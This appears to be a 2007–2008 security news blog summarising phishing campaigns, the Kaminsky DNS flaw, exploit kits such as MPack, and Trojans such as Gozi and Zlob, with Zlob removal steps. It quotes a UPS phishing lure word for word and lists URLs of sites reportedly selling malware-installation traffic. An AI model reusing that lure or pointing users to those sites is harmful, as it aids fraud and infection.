
Friday, November 07, 2008
It has come to our attention that once again Phishing and malware injection has reached an alarming rate.
Sample:
Sorry, we were not able to deliver postal package you sent on October the 19th in time because the recipient address is not correct.
Please print out the invoice copy attached and collect the package at our office.
If you do not receive package in ten days you will have to pay 6$ per day.
Your UPS
It is clear to most of us, that UPS would never send you an email with a zip file in it. But then not everyone is experienced and this is the problem. If you have not sent anything via UPS delete stuff like this if you have then go to UPS tracking do not open zip files which have an .exe in them then be silly enough to click them. The best rule is if you do not come from a valid source just delete it.

Thursday, September 11, 2008
Obama sex video? Hardly. It's spyware spreading via e-mail
Don't believe everything you read on the Internet: Democratic presidential candidate Barack Obama isn't a terrorist...or a porn star.
A malicious spam e-mail is spreading that claims to have a link to a sex video of Obama but is instead spyware that steals sensitive data from the computer, security firm Sophos warned on Wednesday.
The subject line says "Obama sex video!!!" and the e-mail appears to come from "infonews@obama.com, Graham Cluley, senior technology consultant at Sophos, says on his blog.
Clicking on the link downloads an executable file that plays an amateur porn video, but Obama is not in it.
Meanwhile, behind the scenes a Trojan horse known as Mal/Hupig-D is installed. The Trojan targets Windows machines and steals passwords and bank account data, Cluley said.
Is it the work of the Republicans? Probably not; it has the trademark bad grammar and excessive punctuation of traditional phishing attempts, many of which originate outside English-speaking countries.

Tuesday, August 12, 2008
The Internet remains vulnerable to exploits of a critical security flaw in the Domain Name System, a Russian programmer demonstrated last week. Writing on his blog on Friday, Evgeniy Polyakov posted that he had succeeded in getting patched DNS software to return an incorrect location in less than 10 hours.
Researchers who spearheaded an international push to get internet service providers and other large organizations to patch the flaw said they weren't terribly concerned about the exploit code. That's because Polyakov's attack took 10 hours to carry out using two machines connected directly to the targeted DNS server via a gigabit ethernet link.
"That's a little different then spending 10 seconds over the internet," to carry out an attack, said Dan Kaminsky, the researcher who first warned of the DNS cache poisoning vulnerability.
The original attack works by flooding a DNS server with thousands of requests for domains with slightly different variations, 1.google.com, 2.google.com, 3.google.com and so forth. That allows attackers to gain a secret transaction number needed to trick other computers into updating their records with IP addresses that lead to rogue websites.
So a word to the big players of world: You dodged a bullet in surviving the Kaminsky bug without issue, but next time you may not be as lucky.
Creating a real fix won't be easy, but it's essential.

Friday, August 08, 2008
Expectations ran running high before Wednesday morning as Kaminsky, director of penetration testing for IOActive, had revealed little about his DNS vulnerability up till then. That didn't stop others from trying to figure it out. But that actually helped Kaminsky in the end; it meant during his speech, he was able to skip the what and go directly to the why.
Security researchers always thought it was hard to poison DNS records, but Kaminsky said to think of the process as a race, with a good guy and bad guy each trying to get a secret number transaction ID. "You can get there first," he said, "but you can't cross finish line unless you have the secret number."
The question is why would someone bother? Well, Kaminsky talked about how deeply embedded DNS is in our lives. Kaminsky said there are three ages in computer hacking. The first was attacking servers (for example FTP and Telnet). The second was attacking the browsers (for example Javascript and ActiveX). We're now about to enter the third age, where attacking Everything Else is possible.
We know that if we type a name.com into a browser, the DNS resolves it to its numerical address. But what we don't realize is that same process occurs when we send e-mail or when we log onto a Web site. These also require DNS lookup.
Kaminsky then detailed how various security methods on the Web can be defeated if one owns the DNS. For example, if a site wants to establish a Trust Authority Certificate with the Certificate Authorities, they use e-mail to confirm the identity of the requester. He also said that it's possible to poison Google Analytics and even Google AdSense, which also rely on DNS lookup.
Prior to the patch, the bad guy had a 1 in 65,000 chance of getting it because the transaction ID is based, in part, on the port number used. With the patch, the chances decrease to 1 in 2,147,483,648. Kaminsky said it's not perfect, but it's a good enough start

Thursday, August 07, 2008
The DNS vulnerability in the Internet's design is allowing criminals to silently redirect traffic to Web sites under their control. The problem is being fixed, but its extent remains unknown and many people are still at risk.
The bug's existence was revealed nearly a month ago. Since then, criminals have pulled off at least one successful attack, directing some AT&T Inc. Internet customers in Texas to a fake Google site. The phony page was accompanied by three programs that automatically clicked on ads, with the profits for those clicks flowing back to the hackers.
There are likely worse scams happening that haven't been discovered or publicly disclosed by Internet service providers. "You can bet that the (Internet providers) are going to stay tightlipped about any attacks on their networks," said HD Moore, a security researcher.
The AT&T attack probably would have stayed quiet had it not affected the Internet service of Austin, Texas-based BreakingPoint Systems Inc., which makes machines for testing networking equipment and has Moore as its labs director. He disclosed the incident in hopes it would help uncover more breaches.
The underlying flaw is in the Domain Name System (DNS), a network of millions of servers that translate words typed into Web browsers into numerical codes that computers can understand.
What this means is that a computer user in say, San Francisco, might type http://www.yahoo.com and head straight to the real Yahoo site, while at the same moment, a user in New York — whose traffic is routed through different DNS servers — might type that same Web address and end up on a phony duplicate site.
Looking for secure dns services? SOADNS.com

Tuesday, July 08, 2008

Saturday, June 21, 2008
I will not start this article beating on the Washingtonpost.com. One should seriously question the headline of the article! I guess if it hits the United Nations it is news! The world has problems; #1 is certainly determining blame, followed by a posse mentality.
Giorgio Maone at hackademix was the one consistent calm in the storm of comments. When you look for answers to the Universe this is always good reading material. It is only a joke people so lets not get too serious. This article does point out the problem and suggest some solutions.
I do seriously wonder why the WashingtonPost.com article included the wrong assertion by PandaLabs that the problem is actually Microsoft's, with IIS being the cause. Perhaps just a case of fair and balanced reporting? But then going on for several more paragraphs, with non relevant links over an advisory which is not even the point, is beyond me!
The article's comments did bring the usual Linux desktop dorks out of the woodwork. It always amazes how MAC and Linux people have this idea that they are 10 foot tall and bullet proof. I do have several Linux machines but really this attack has nothing to do with the OS or the web server. A SQL injection is all about poorly formed code. I see you there looking for the person to blame! Stop It!
"Developers at fault? SQL Injection attacks lead to wide-spread compromise of IIS servers" is the headline at ZDNet! It is a great article and should be read by anyone who has any questions about this type of attack also this article. But really lets not go through life with this posse mentality. Lets try to focus more on the thugs who cause this type of thing. I don't mean getting bottom feeding law makers involved. Sharing information and taking action is the only real cure.
A tip to developers: Don't write code and walk away. If you have a contract like this, it must come with warnings to the client. If you maintain a site it is your duty to remain vigilant and update code. If you are not charging for this; you should revise your contracts to assure you have covered all the bases. If you are charging, then do your job!

Monday, June 09, 2008
Microsoft is a company that usually keeps plenty busy advising users of security issues with its products. Redmond is now advising users about a blended security threat that involves users running Apple's Safari Web browser on Windows.
The threat could potentially allow Safari to download a malicious file that Windows would then execute. Microsoft has a work-around it suggests, though no patch is available from Apple (NASDAQ: AAPL) for the issue.
"Security Advisory (953818) does not refer to vulnerability in either Safari or Windows," Tim Rains, security response communications lead for Microsoft said in a statement sent to InternetNews.com.
The Safari issue had been publicly disclosed by security researcher Nitesh Dhanajani on May 15. Dhanajani described the issue as a 'Safari Carpet Bomb' in his discussion of the security risk.

Saturday, May 17, 2008
Mozilla warned Wednesday that a malicious program inserted adware code into a Firefox plugin that has been downloaded thousands of times over the past three months.
Because of a virus infection, the Vietnamese language pack for Firefox 2 was polluted with adware, Mozilla security chief Window Snyder said in a blog posting. "Everyone who downloaded the most recent Vietnamese language pack since February 18, 2008 got an infected copy," she wrote. "Mozilla does virus scans at upload time but the virus scanner did not catch this issue until several months after the upload."
Mozilla is now going to add additional scans of its software to prevent this kind of thing from happening in the future.
The malware in the language pack is from the Xorer Trojan, according to discussion on Mozilla's Bugzilla developer Web site, which indicates that Mozilla developers first discovered the issue on Tuesday.
Mozilla missed the code during its initial scan because antivirus vendors had not yet added detection for Xorer into their products. Antivirus vendor Panda Security first detected Xorer on Feb. 28, 10 days after the infected plugin was published. Firefox developers have now scanned all of their plugins.
The open-source browser maker does not know how many people were infected with the adware, but the plugin was downloaded more than 1,200 times in the past week and has been downloaded 16,667 times since November.

Sunday, May 11, 2008
Security researchers have developed a new type of malicious rootkit software that hides itself in an obscure part of a computer's microprocessor, hidden from current antivirus products.
Called a System Management Mode (SMM) rootkit, the software runs in a protected part of a computer's memory that can be locked and rendered invisible to the operating system, but which can give attackers a picture of what's happening in a computer's memory.
The proof-of-concept software will be demonstrated publicly for the first time at the Black Hat security conference in Las Vegas this August. The rootkits used by cyber crooks today are sneaky programs designed to cover up their tracks while they run in order to avoid detection. Rootkits hit the mainstream in late 2005 when Sony BMG Music used rootkit techniques to hide its copy protection software. The music company was ultimately forced to recall millions of CDs amid the ensuing scandal.
In recent years, however, researchers have been looking at ways to run rootkits outside of the operating system, where they are much harder to detect. For example, two years ago researcher Joanna Rutkowska introduced a rootkit called Blue Pill, which used AMD's chip-level virtualization technology to hide itself. She said the technology could eventually be used to create "100 percent undetectable malware." Full Article

Saturday, March 29, 2008
A blossoming Web attack, first reported by security researcher Dancho Danchev earlier this month, has expanded to hit more than a million Web pages, including many well-known sites.
The number and importance of the sites has increased," wrote Danchev in a where he reported that trusted Web sites such as USAToday.com, Target.com, and Walmart.com have been hit with the attack.
The criminals behind this have not actually hacked into servers, but they are taking advantage of Web programming errors to inject malicious code into search results pages created by the Web sites' internal search engines.
Malicious parties are actively poisoning these sites' search query caching feature to position the keywords among the top ten search results, thereby infecting anyone coming across them," said Danchev, in an instant-message interview.
He believes that more than 1 million Web pages have been infected using this technique.
"The more keywords they submit with [malicious] script, the more pages with popular keywords the high page ranked sites would cache," he said. This increases the chance that someone will see the search results hosted on the reputable site and click on the malicious page.
The Web sites that have been hit with this attack could fix the problem by doing a better job of checking the search queries on their internal search engines to make sure that there is no malicious code in them, Danchev said.
Hackers are increasingly looking for ways to install their code on trusted Web sites. In recent weeks, security vendors have found hundreds of thousands of Web pages affected by this and other similar attacks.

Monday, March 17, 2008
Websense Security Labs has discovered that Google’s popular web mail service Gmail is being targeted in recent spammer tactics. Spammers in these attacks managed to created bots that are capable of signing up and creating random Gmail accounts for spamming purposes.
Websense believes that from the spammers’ perspective, there are four main advantages to this approach. First, signing up for an account with Google allows access to its wide portfolio of services. Second, Google’s domains are unlikely to be blacklisted. Third, they are free to sign up. And fourth, it may be hard to keep track of them as millions of users worldwide are using various Google services on a regular basis. Learn More

Monday, January 21, 2008
Criminals have been able to hack into computer systems via the Internet and cut power to several cities, a U.S. CIA analyst said. Speaking at a conference of security professionals on Wednesday Jan 16 2008, CIA analyst Tom Donahue disclosed the recently declassified attacks while offering few specifics on what actually went wrong.
Criminals have launched online attacks that disrupted power equipment in several regions outside of the U.S., he said, without identifying the countries affected. The goal of the attacks was extortion, he said.
"We have information, from multiple regions outside the United States, of cyber intrusions into utilities, followed by extortion demands," he said in a statement posted to the Web on Friday by the conference's organizers, the SANS Institute. "In at least one case, the disruption caused a power outage affecting multiple cities. We do not know who executed these attacks or why, but all involved intrusions through the Internet."
One conference attendee said the disclosure came as news to many of the government and industry security professionals in attendance. "It appeared that there were a lot of people who didn't know this already," said the attendee, who asked not to be identified because he is not authorized to speak with the press.
He confirmed SANS' report of the talk. "There were apparently a couple of incidents where extortionists cut off power to several cities using some sort of attack on the power grid, and it does not appear to be a physical attack," he said.
Hacking the power grid made front-page headlines in September when CNN aired a video showing an Idaho National Laboratory demonstration of a software attack on the computer system used to control a power generator. In the demonstration, the smoking generator was rendered inoperable. The U.S. is taking steps to lock down the computers that manage its power systems, however.
On Thursday, the Federal Energy Regulatory Commission (FERC) approved new mandatory standards designed to improve cybersecurity.

Tuesday, December 04, 2007
Microsoft said Monday that a flaw in the way its Windows operating system looks up other computers on the Internet has resurfaced and could expose some customers to online attacks. Security Advisory
The flaw primarily affects corporate users outside of the U.S. It could theoretically be exploited by attackers to silently redirect a victim to a malicious Web site.
Microsoft originally patched this flaw in 1999, but it was rediscovered recently in later versions of Windows and was then publicized at a recent hacker conference in New Zealand. "This is a variation of that previously reported vulnerability that manifests when certain client side settings are made," said Mike Reavey, a group manager at Microsoft's Security Response Center.
The bug has to do with the way Windows systems look for DNS (Directory Name Service) information under certain configurations.
Any version of Windows could theoretically be affected by the flaw, but Microsoft issued an advisory Monday explaining which Windows configurations are at risk and offering some possible workarounds for customers. The company said it is working to release a security patch for the problem.
• Customers who do not have a primary DNS suffix configured on their system are not affected by this vulnerability. In most cases, home users that are not members of a domain have no primary DNS suffix configured. Connection-specific DNS suffixes may be provided by some Internet Service Providers (ISPs), and these configurations are not affected by this vulnerability.
• Customers whose DNS domain name is registered as a second-level domain (SLD) below a top-level domain (TLD) are not affected by this vulnerability. Customers whose DNS suffixes reflect this registration would not be affected by this vulnerability. An example of a customer who is not affected is contoso.com or fabrikam.gov, where “contoso” and “fabrikam” are customer registered SLDs under their respective “.com” and “.gov” TLDs.
• Customers who have specified a proxy server via DHCP server settings or DNS are not affected by this vulnerability.
• Customers who have a trusted WPAD server in their organization are not affected by this vulnerability. (See the Workaround section for specific steps in creating a WPAD.DAT file on a WPAD server.)
• Customers who have manually specified a proxy server in Internet Explorer are not at risk from this vulnerability when using Internet Explorer.
• Customers who have disabled 'Automatically Detect Settings' in Internet Explorer are not at risk from this vulnerability when using Internet Explorer.

Monday, October 15, 2007
Microsoft released six updates on Tuesday for at least nine security flaws, fixing critical issues in Word, Internet Explorer and the e-mail programs that the company ships with its Windows operating systems.
The most widespread vulnerability appears to be in the way Internet Explorer handles a script error, allowing an attacker to access freed memory. The flaw has been rated critical on for both IE 6 and IE 7 running on Windows XP and Vista. Because Internet Explorer runs in an enhanced security configuration on Windows Server 2003, that platform is not impacted as severely. The three other vulnerabilities fixed by the Cumulative Security Update for Internet Explorer had a maximum severity of Moderate.
Another vulnerability in the way Microsoft's e-mail programs handled news groups via NNTP (Network News Transfer Protocol) was rated Critical for Outlook Express and Important for Windows Vista's Mail application. The software giant rated a vulnerability in Microsoft Word only Critical for Office 2000 and Important for later versions of the productivity suite. A security hole in the Kodak Image Viewer also received a Critical rating by Microsoft.
Windows users should patch their systems as soon as possible. Online attacks have increasingly used flaws in Internet Explorer to redirect unwary visitors, using IFrames, from legitimate sites to malicious sites that compromise the victims computers. The MPack infection tool kit is one of the programs commonly used to automate the process. Espionage attacks emanating from servers in China, among other nations, have regularly used Office flaws to infect the victim's computer.

Tuesday, September 25, 2007
A vulnerability in Ask.com's toolbar for Internet Explorer could allow an attacker to take control of a person's computer, according to security advisories.
The problem concerns a buffer overflow flaw in the toolbar and involves an ActiveX control, according to an advisory posted by security vendor Secunia APS, which rated the problem as "highly critical," its second most severe rating. It affects version 4.0.2 of the toolbar and possibly others.
Proof-of-concept exploit code for the vulnerability has been publicly posted on other disclosure forums, with a person named "Joey Mengele" credited with finding the flaw. Ask.com officials contacted in London were not immediately available to comment.
The Ask.com toolbar sits below the address bar and can perform a variety of category-specific searches, such as weather information, stock quotes or search a person's desktop, as well as Web searching.
As of Tuesday afternoon local time, WabiSabi Labi Ltd., a Swiss company that specializes in selling vulnerability information, was still auctioning the Ask.com toolbar problem for a minimum of $705, although no bids were listed.
WabiSabi Labi's auctioning of security vulnerabilities has caused a stir among security analysts who believe software companies should be discreetly notified of vulnerabilities and allowed to patch the software so as to not put users in danger. The company maintains security researchers should be rewarded for their work.

Thursday, August 23, 2007
The MPack toolkit has received a fair amount of media attention causing it to become one of the most desired Web browser exploit toolkits in the underground hacker scene. The original author was selling the MPack toolkit for $1000 USD, including a year of free support, and additional exploit modules for around $100 USD. Personally like the quote from the author when asked; Do you feel sorry for the people whose machines are infected by an attack? Well, I feel that we are just a factory producing ammunition. Now there is some logic for you!
However, considering the toolkit is written in a script language, it is easy to redistribute and modify. The toolkit is being sold by others now for as low as $150 USD. That is a whopping 85% off. Talk about clearance sale. The sellers likely didn't even need to buy it themselves, but rather probably found some of the multiple Web sites that did not employ standard Web site protections, allowing them to download the whole kit for free.
How it works is clearly outlined and Trend Micro does at least offer a method of discovery. What is odd with all the press about this organized criminal approach to fraud and thieft is governments, security firms, and anti virus companies of the world are doing very little. Now that the cat is out of the bag the variants will be haunting the world making the internet totally infested with poor ignorant users. As the list of variants grows each with its own twist on the base. What is at the core besides ignorance, is the social engineering part of this type of threat.
More details and articles on the topic. EWeek, Microsoft, BBC, Wikipedia
There are many marketing companies that promote web traffic to different Web pages, software installations, etc. They use what they call 'affiliate programs', paying money for every software installed or traffic generated. This web traffic is very assorted: activex, rogue-antispywares, bundles, banners, fakecodecs, iframes, etc.
Although some of these marketing enterprises can be well-intentioned, other have been specifically created by & for cybercriminals to earn money. Here we can see a gif file that was being used by one of these companies in order to advertise itself in an underground malware forum:

A short time ago, analyzing a Trj/Sinowal variant (a banking Trojan) to discover where it was sending the information to, it was found one of these websites. It was discovered that this site had 4 different kits to install malware through exploits in the same server the page was hosted in:
There was an IcePack, a Traffic Pro, a Prime Exploit System, and a very basic kit that only used two exploits and had no name. These kits were downloading two Trojans: Trj/Galapoper and Trj/Sinowal. This is not the first time we see something similar. The web sites where they promote themselves use to be very eye-catching, here you can see some examples:
http://fantasticdollars.com/
http://iframe911.com/
http://www.iframebiz.com/
http://loads.cc/
What seems to be the solid theme throughout this whole deal is that most of the Trojan Variants are based on a kit called Mpack.

Monday, August 20, 2007
Secure Computing back in June first reported, attackers are using a fake video link on the site to initiate infection with the Trojan, which bombards victims with porn adware, before installing data-stealing code.
To make matters worse, the only defence against such attacks on the popular video-hosting website is the diligence of YouTube's security personnel, who can remove attacks as soon as they find them. However, according to Secure Computing's Paul Henry, this gives the malware distributors a window of opportunity of at least a few hours.
It is a backdoor designed to give the attacker remote control over a compromised computer. It changes essential system settings and modifies certain files. Zlob starts automatically on every Windows startup and stays hidden in background. It waits for remote connections and allows the attacker to download and install additional software, execute certain commands and manage the entire system. Zlob can be very dangerous. Use antivirus and spyware removal tools in order to get rid of this parasite. Some of Zlobs versions pretend to be video codecs to attract people.
Kill processes:
msmsgs.exe pmsngr.exe kdqrn.exe 02.exe kdvhv.exe kdoaf.exe kdkwb.exe kdkat.exe kdlfk.exe kdefp.exe
Delete registry values:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\RegSvr32=%System%\msmsgs.exe
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell=explorer.exe,msmsgs.exe
HKCU\Software\Internet Security\
HKCU\Software\HQvideo
Delete files:
msmsgs.exe isaddon.dll isamini.exe pmsngr.exe Programs\\Media-Codec\\ecodec.exe kdqrn.exe Temp\\02.exe kdvhv.exe Temp\\nsq3.tmp\\modern-header.bmp Temp\\nsq3.tmp\\nsExec.dll kdoaf.exe kdkwb.exe System\\kdkat.exe System\\kdlfk.exe System\\kdefp.exe

Saturday, August 11, 2007
The partner event registration page of the Microsoft UK events website, has been defaced by a hacker who managed to discover and exploit a web application vulnerability in one of the parameters used by the form on the website, which could previously be accessed at:
http://www.microsoft.co.uk/events/net/eventdetail.aspx?eventid=8399 [taken offline]
The hacker, known by the name "rEmOtEr", managed to deface Microsoft’s page by taking advantage of an SQL Injection vulnerability in one of the parameters used by the form that was embedded in the URL of the page. This particular parameter was not being filtered, thus it allowed the hacker to pass any type of crafted code directly to the database being used by this form.
Full Article

Tuesday, August 07, 2007
US federal agents are reaching out to computer hackers for help fighting crime and terrorism as a tug-of-war between privacy and public safety continues on the Web.
The National Security Agency (NSA), the department of defence and the FBI were among the spy, military and police agencies represented at DefCon, an international gathering of hackers in Las Vegas.
Lawyers from the foundation are spearheading litigation accusing the NSA of illegally snooping on e-mail and telephone communications. NSA vulnerability analysis chief Tony Sager gave a talk at DefCon, saying the agency was increasingly sharing information with the public in the hope computer wizards wherever they may be become allies in cyber security.
Hacker Roger Dingledine is working on an "anonymity network" called Tor that bounces Internet traffic off "about a thousand" computer servers to thwart tracking who is doing what online.
"The NSA spent decades trying to do things themselves and that didn't work. I'm happy they realise other people can help," he said.
Apple has issued three batches of software updates and fixes for its popular iPhone, Mac OS X operating system and the Safari 3.03 browser beta.
The iPhone fixes address a pair of Safari-related vulnerabilities that came up almost immediately after the phone's release, plus three more that were not disclosed.
A security firm called Independent Security Experts (ISE) first uncovered iPhone vulnerabilities last month and informed Apple of its findings. ISE planned to demonstrate what it found at the Black Hat security conference this week in Las Vegas.
Two of the fixes address cross-site scripting problems, one by preventing JavaScript in remote Web pages from modifying pages outside of their domain, the other by fixing an HTTP injection issue in XMLHttpRequest. Apple credited Richard Moore of Westpoint Ltd. for reporting the issue.
Apple credited the ISE crew for pointing out a heap buffer overflow problem in the Perl Compatible Regular Expressions (PCRE) library, while Apple thanked Tomohito Yoshino, of Business Architects, for reporting an error in the International Domain Name (IDN) that allows for fake URL addresses in fonts that contain look-alike characters.
Once again security researcher Joanna Rutkowska took the stage at Black Hat, and once again she set out to prove in glorious detail how to exploit and attack Microsoft Windows Vista.
This year she brought a new pill and a few more tricks to take Vista to task. "I'm going to talk about Vista kernel protection and why it doesn't work," Rutkowska boldly declared to the overflow crowd.
She then read a quote from Microsoft's Vista documentation that stated that even users with admin privileges cannot load unsigned kernel-mode code on the system. Then she smiled mischievously.
"There are thousands, maybe tens of thousands of third-party drivers that are poorly written and could be a problem," Rutkowska said.
She then displayed two examples, both from video drivers companies, to prove her point. In her view both the ATI Catalyst driver and the NVIDIA nTune Driver are bad in that they could be used as an attack vector to circumvent Vista kernel protection.
With the NVIDIA driver, Rutkowska alleged that the driver was able to read and write registers without any additional checks.
"The whole problem in NVIDIA is that the driver doesn't do the proper checks and can do a write for an arbitrary registry."
To add further insult to injury, the target machine doesn't even need to have the bad driver on the system in order for the attacker to use it as an attack vector.
"The attacker could just include it as part of their own rootkit and then use it to exploit Vista," Rutkowska said. "It doesn't matter whether it's a popular driver or not. We can bring it to the target system and exploit it." Full Article

Thursday, August 02, 2007
As reported by John Schwartz in today's New York Times (registration required), security firm Independent Security Evaluators has demonstrated an attack that lets a hostile Web page take full control of an iPhone and capture a user's personal data. Although there is no indication that the vulnerability is being exploited in the wild, computer scientist Steven M. Bellovin of Columbia University is quoted as saying "it looks like a very genuine hack." (You can watch a video demonstration of the attack here.)
Bellovin points out that this sort of attack is inevitable as operating systems on phones get more and more computer-like. The iPhone runs a version of Mac's OS X operating system, though Apple has been extremely stingy with details on just which pieces of OS X are included. It's not clear whether the iPhone attack, which exploits a vulnerability in the Safari browser, might also work against Macs.
To date, attacks against phones have been relatively rare and not very damaging. The Symbian operating system, which is little used in the U.S. but is popular on European and Asian handsets from Nokia and Sony Ericsson, has probably been hit the hardest. I have not heard of any successful attacks on Research in Motion's BlackBerrys. And hackers have only struck a couple of glancing blows on Microsoft's Windows Mobile software, though the threat is taken seriously enough that you can now get protective software for your smartphone from Symantec and others.
Apple likely will move to plug the hole with a patch that can be downloaded to iPhones. But this incident is a clear sign that the cat and mouse game between security experts and hackers that has long been a part of life in the world of personal computers is going to become commonplace in phones too.

Wednesday, August 01, 2007
Finjan, a developer of Web security products, has found what has to be the nastiest of malware yet because it inserts itself into a legitimate online banking transaction that's supposed to be protected by SSL encryption.
The company is calling this new form of thievery "crimeware," as if we needed another term to keep straight, but it's nasty stuff. In just the month of July, Finjan identified 58 criminals using the MPack toolkit to infect over 500,000 unique users.
MPack may be the most dangerous malware development kit seen yet. It is a PHP-based kit produced by Russian hackers for building mostly keylogging software. It's actually sold and supported by the Russians, complete with a service contract for new versions, and is upgraded every two to four weeks. It's not the first time a service contract has been offered for software that supports the spread of malware.
Full Article Here

Thursday, July 26, 2007
Think you're smart at recognizing online scams? Take a quiz to find out. Visit http://tinyurl.com/ytec4u
McAfee Inc.'s SiteAdvisor service has created a 10-question test to see whether you can spot "phishing" attempts to steal passwords and other personal information by mimicking popular Web sites such as eBay Inc.'s PayPal and News Corp.'s MySpace.

Tuesday, June 19, 2007
Make sure you only mouse over your Hallmark E-Card it might not be real they would never use an IP address associated to postacard.exe


Monday, May 21, 2007

A new, stealthier version of a previously known Russian Trojan horse program called Gozi has been circulating on the Internet since April 17 and has already stolen personal data from more than 2,000 home users worldwide.
The compromised information includes bank and credit card account numbers (including card verification value codes), Social Security numbers and online payment account numbers as well as usernames and passwords. As with its predecessor, the new version of Gozi is programmed to steal information from encrypted Secure Sockets Layer (SSL) streams and send the stolen information to a server in Russia.
The variant was discovered by Don Jackson, a security researcher at Atlanta-based SecureWorks Inc. who also discovered the original Gozi Trojan horse back in January. One of improvements is its use of a new and hitherto unseen "packer" utility that encrypts, mangles, compresses and even deletes portions of the Trojan horse code to evade detection by standard, signature-based antivirus tools. The original Gozi, in contrast, used a fairly commonly known packing utility called Upack, which made it slightly easier to detect than the latest version.
This version of Gozi also has a new keystroke-logging capability for stealing data, in addition to its ability to steal data from SSL streams. According to Jackson, the keystroke logger appears to be activated when the user of an infected computer visits a banking Web site or initiates an SSL session. It is still unclear how exactly the keystroke logger knows to turn itself on and capture information.
Apart from those two differences, the variant is identical to Gozi, Jackson said. The Trojan horse takes advantage of a previously fixed vulnerability in the iFrame tags of Microsoft Corp.'s Internet Explorer to infect systems. Users typically appear to be infected when visiting certain hosted Web sites, community forums, social networking sites and those belonging to small businesses.
The original Trojan horse stole more than 10,000 records containing confidential information belonging to about 5,200 home users, companies, government agencies and law enforcement organizations before being detected. The server to which the data was being sent to had a very professional-looking front end that allowed users to log into individual accounts, view indexed data and get results from queries based on certain fields such as URL and form parameters.

Friday, May 11, 2007
University of Missouri officials said campus computer technicians confirmed a breach of a database last week by a user or users whose Internet accounts were traced to China and Australia.
The hacker accessed personal information of 22,396 University of Missouri-Columbia students or alumni who also worked at one of the system's four campuses in St. Louis, Kansas City, Rolla or Columbia in 2004.
The hacker obtained the information through a Web page used to make queries about the status of trouble reports to the university's computer help desk, which is based in Columbia. The information had been compiled for a report, but the data had not been removed from the computer system.
In January, a hacker obtained the Social Security numbers of 1,220 university researchers, as well as personal passwords of as many as 2,500 people who used an online grant application system.
The university is contacting people affected by the latest breach and providing instructions on how to monitor their credit reports and other financial records for suspicious activity, officials said.

Sunday, May 06, 2007
Symantec Corp. researchers Friday warned of an in-the-wild Trojan horse that poses as a Windows activation program to dupe users into entering credit card information in an attempt to reanimate their machines.
Dubbed Kardphisher, the Trojan is nothing much technically, reported Takashi Katsuki, a Symantec researcher. But its author has "obviously taken great pains to make it appear legitimate."
Once the Trojan's installed, it throws up an official-looking screen that claims the user's copy of Windows was activated by someone else. "To help reduce software piracy, please re-activate your copy of Windows now," the screen reads. "We will ask you for your billing details, but your credit card will NOT be charged."
Selecting "No," said Katsuki, shuts down the PC. "Yes," meanwhile, takes the user to a second screen where he or she is asked to enter her name and credit card information, which is then transmitted to the hacker's server. "This Trojan teaches us all a good lesson," added Katsuki. "Trust no one."
An external computer hard drive containing the personal, bank and payroll information of up to 100,000 former and current Transportation Security Administration (TSA) employees was reportedly stolen from a human resources office in Crystal City, VA. The Federal Bureau of Investigation and U.S. Secret Service are now helping the TSA investigate the theft -- FBI is conducting the investigation, with the Secret Service conducting a "forensic review of equipment and facilities."
The TSA learned about the missing hard drive sometime Thursday, but the agency informed possibly affected employees Friday evening -- a delay which has upset some employees. TSA spokesperson Ellen Howe reassured agency employees by stating the TSA was "not trying to stall."
"TSA has no evidence that an unauthorized individual is using your personal information, but we bring this incident to your attention so that you can be alert to signs of any possible misuse of your identity," said Kip Hawley, TSA Administrator.
The TSA is unaware if the hard drive has left its premises. The hard drive contained sensitive information on employees who worked for the TSA from January 2002 until August 2005. The agency employs almost 50,000 people and is the agency responsible for securing transportation systems in the country, including airports and railroads.
Letters were sent out to all affected employees promising one year of credit monitoring services.

Sunday, April 22, 2007
A hacker managed to break into a Mac and win a $10,000 prize as part of a contest started at the CanSecWest security conference in Vancouver.
In winning the contest, he exposed a hole in Safari, Apple Inc.s browser. "Currently, every copy of OS X out there now is vulnerable to this," said Sean Comeau, one of the organizers of CanSecWest.
The conference organizers decided to offer the contest in part to draw attention to possible security shortcomings in Macs. "You see a lot of people running OS X saying it's so secure and frankly Microsoft is putting more work into security than Apple has," said Dragos Ruiu, the principal organizer of security conferences including CanSecWest.
Initially, contestants were invited to try to access one of two Macs through a wireless access point while the Macs had no programs running. No attackers managed to do so, and so conference organizers allowed participants to try to get in through the browser by sending URLs via e-mail.
Dino Di Zovie, who lives in New York, sent along a URL that exposed the hole. Since the contest was only open to attendees in Vancouver, he sent it to a friend who was at the conference and forwarded it on.
The URL opened a blank page but exposed a vulnerability in input handling in Safari, Comeau said. An attacker could use the vulnerability in a number of ways, but Di Zovie used it to open a back door that gave him access to anything on the computer, Comeau said. The vulnerability won't be published. 3Com Corp.'s TippingPoint division, which put up the cash prize, will handle disclosing it to Apple.
The prize for the contest was originally one of the Macs. But on Thursday evening, TippingPoint put up the cash award, which may have spurred a wider interest in the contest.
One reason Macs haven't been much of a target for hackers is that there are fewer to attack, said Terri Forslof, manager of security response for TippingPoint. "It's an incentive issue. The Mac is not as widely deployed of a platform as say Windows," she said. In this case, the cash may have provided motivation.

Monday, March 26, 2007
JavaScript coding errors and Web developers who are inexperienced at working with emerging programming techniques represent serious threats to the security of many Internet sites and the people who visit them, according to malware researchers.
Speaking at the ongoing ShmooCon hacker convention on March 24, Billy Hoffman, lead research engineer at Atlanta-based software maker SPI Dynamics, detailed what he views as an epidemic problem in today's online world. SPI markets penetration testing tools used by businesses to ferret out security issues from their online sites and applications.
The proposed threat is centered on the prevalence of JavaScript errors and insecure use of so-called Web services programming languages such as AJAX -- which combines asynchronous JavaScript with XML -- in many popular Web sites and applications.
In addition to opening holes in Web applications, Hoffman illustrated how JavaScript and AJAX-based tools can be used by hackers to find new vulnerabilities online, and build XSS (cross-site scripting) attacks that can move from one online domain to another, which he cited as a relatively cutting-edge malware development.
"In the last two years, we've seen JavaScript go from stealing cookies to doing key-logging, screen-scraping and all sorts of phishing attacks," Hoffman said. "JavaScript used to be something that was more annoying than anything, but now it's being used in port scanning, to create self-propagating malware and to steal browser histories."
The researcher, who said that JavaScript vulnerabilities are present in sites maintained by everyone from well-known online retailers to large financial services companies, demonstrated a proof-of-concept exploit based on a JavaScript flaw on CNN.com, and how it could be used to manipulate content on the news site's pages. The issue was reported in security forums several months ago, and sent to CNN by researchers, but it still hasn't been fixed.
Malicious-code writers are using the same techniques to create cross-site scripting threats -- malware attacks that inject code into end users' browsers via holes in legitimate sites -- to mislead consumers into handing over their passwords and giving hackers access to their personal information, according to the researcher.
